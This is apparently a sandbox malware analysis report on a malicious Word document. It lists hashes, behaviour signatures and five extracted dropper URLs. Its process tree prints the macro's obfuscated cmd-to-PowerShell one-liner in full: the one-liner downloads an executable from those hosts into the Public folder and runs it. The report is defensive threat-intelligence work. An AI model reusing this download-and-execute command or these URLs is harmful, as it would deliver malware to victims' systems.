Overview

overview

10

Static

static

1

b9b0bfe962...18.doc

windows7-x64

10

b9b0bfe962...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    17-06-2024 19:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc

  • Size

    217KB

  • MD5

    b9b0bfe962149e50c52b24cec1275534

  • SHA1

    c7b3026099820fd57e7ca7c74944ac22d39e4054

  • SHA256

    c95d7e6efb2ec61100dba574e1a359927e9726efdad76b4c809b93ef12a06f73

  • SHA512

    702a55479507ef63758ee61b132e0cb913188913cf2bbdba20c41fdd967412ec54de83de4983540a9d7a2e58990d73d2496a4a5eac5e0fbc9b5943ec32f11a6b

  • SSDEEP

    3072:SinJXfT7nasKiNKDzaJFUKc0UTE7yZRUV7RJeOzi80:5JXr7nbpEDzYUTE7yZRVUi80

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mimiabner.com/22D_ZGrV5aY_AvvRf
exe.dropper

http://nt-group.kz/86Rzn_wmF7RyQ7F
exe.dropper

http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ
exe.dropper

http://tasmatbaa.com/1MXeJC9_KSsQ7B
exe.dropper

http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\Responsec47\Integrationo30\withdrawaliu95\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2592
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2824

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      3edab193af27fef69b1ca5f242ae711c

      SHA1

      3a1050883e35e1f21f5ceff14f069c6bbbbb5863

      SHA256

      a299502c7aafe9a2e36f70e2aaa2570083491fc7da1f83e7156d485b761581f2

      SHA512

      b88f3f69fdc70b34cb0970cff0bf1abdc66cd128b58bb5460e1e1b0c23c645830076933325ffe4f98bdb2d98e174ad2af2c7f8bbe59c8ea8fde38a2be949ac9c

      Download Submit

    • memory/1916-24-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1916-11-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-8-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-9-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-37-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-32-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-38-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-31-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-26-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-76-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1916-2-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1916-13-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-18-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-23-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-12-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-10-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-25-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-75-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1916-53-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1916-54-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1916-0-0x000000002FFB1000-0x000000002FFB2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2592-50-0x0000000005000000-0x0000000005052000-memory.dmp

      Filesize

      328KB

      Download

    • memory/2592-51-0x0000000004F80000-0x0000000004F95000-memory.dmp

      Filesize

      84KB

      Download